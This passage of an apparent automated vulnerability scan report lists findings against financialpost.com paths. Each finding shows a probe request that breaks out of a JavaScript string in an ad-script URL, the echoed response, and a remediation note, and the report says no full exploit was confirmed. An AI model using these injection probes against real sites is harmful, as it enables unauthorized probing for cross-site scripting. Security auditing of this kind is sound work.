Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43189


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/legalde7ae';ad722b91cc3/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=legalde7ae';ad722b91cc3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=64094012?">
...[SNIP]...

1.193. http://www.financialpost.com/news/marketing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/marketing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b9fe'%3beb1408074c9 was submitted in the REST URL parameter 1. This input was echoed as 3b9fe';eb1408074c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news3b9fe'%3beb1408074c9/marketing/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43306


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news3b9fe';eb1408074c9/marketing/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news3b9fe';eb1408074c9;kw=marketing;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=20978426?">
...[SNIP]...

1.194. http://www.financialpost.com/news/marketing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/marketing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28044'%3bc70d3668348 was submitted in the REST URL parameter 2. This input was echoed as 28044';c70d3668348 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/marketing28044'%3bc70d3668348/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43269


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/marketing28044';c70d3668348/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=marketing28044';c70d3668348;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79147008?">
...[SNIP]...

1.195. http://www.financialpost.com/news/mining/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/mining/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d492c'%3b18622a2ecd was submitted in the REST URL parameter 1. This input was echoed as d492c';18622a2ecd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsd492c'%3b18622a2ecd/mining/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36406


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsd492c';18622a2ecd/mining/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsd492c';18622a2ecd;kw=mining;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95276488?">
...[SNIP]...

1.196. http://www.financialpost.com/news/mining/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/mining/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 287dd'%3beeb5abe1ff2 was submitted in the REST URL parameter 2. This input was echoed as 287dd';eeb5abe1ff2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/mining287dd'%3beeb5abe1ff2/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43209


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/mining287dd';eeb5abe1ff2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=mining287dd';eeb5abe1ff2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33158550?">
...[SNIP]...

1.197. http://www.financialpost.com/news/technology/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/technology/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d5c4'%3b688bdb9d235 was submitted in the REST URL parameter 1. This input was echoed as 4d5c4';688bdb9d235 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news4d5c4'%3b688bdb9d235/technology/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news4d5c4';688bdb9d235/technology/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news4d5c4';688bdb9d235;kw=technology;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=10817757?">
...[SNIP]...

1.198. http://www.financialpost.com/news/technology/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/technology/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 278b5'%3b89821bbfc44 was submitted in the REST URL parameter 2. This input was echoed as 278b5';89821bbfc44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology278b5'%3b89821bbfc44/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/technology278b5';89821bbfc44/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=technology278b5';89821bbfc44;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44991912?">
...[SNIP]...

1.199. http://www.financialpost.com/opinion/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63693'%3b5121090781a was submitted in the REST URL parameter 1. This input was echoed as 63693';5121090781a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion63693'%3b5121090781a/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43940


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion63693';5121090781a/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion63693';5121090781a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=22167228?">
...[SNIP]...

1.200. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/breaking-views/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd052'%3b65c989df336 was submitted in the REST URL parameter 1. This input was echoed as bd052';65c989df336 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionbd052'%3b65c989df336/breaking-views/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37628


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionbd052';65c989df336/breaking-views/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionbd052';65c989df336;kw=breaking-views;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14176007?">
...[SNIP]...

1.201. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/breaking-views/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a05'%3b5e640f9eda1 was submitted in the REST URL parameter 2. This input was echoed as 85a05';5e640f9eda1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/breaking-views85a05'%3b5e640f9eda1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44256


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/breaking-views85a05';5e640f9eda1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=breaking-views85a05';5e640f9eda1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=41116950?">
...[SNIP]...

1.202. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1998'%3bdad09d492bc was submitted in the REST URL parameter 1. This input was echoed as b1998';dad09d492bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionb1998'%3bdad09d492bc/columnists/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37548


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionb1998';dad09d492bc/columnists/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionb1998';dad09d492bc;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=96826146?">
...[SNIP]...

1.203. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7773e'%3bee2319eb393 was submitted in the REST URL parameter 2. This input was echoed as 7773e';ee2319eb393 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists7773e'%3bee2319eb393/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44176


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists7773e';ee2319eb393/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists7773e';ee2319eb393;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=58999813?">
...[SNIP]...

1.204. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f06c4'%3ba01e7d2f0a9 was submitted in the REST URL parameter 1. This input was echoed as f06c4';a01e7d2f0a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionf06c4'%3ba01e7d2f0a9/columnists/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78746
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionf06c4';a01e7d2f0a9/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionf06c4';a01e7d2f0a9;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94765539?">
...[SNIP]...

1.205. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10172'%3be803ff19434 was submitted in the REST URL parameter 2. This input was echoed as 10172';e803ff19434 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists10172'%3be803ff19434/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78669
Expires: Sun, 19 Dec 2010 03:13:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
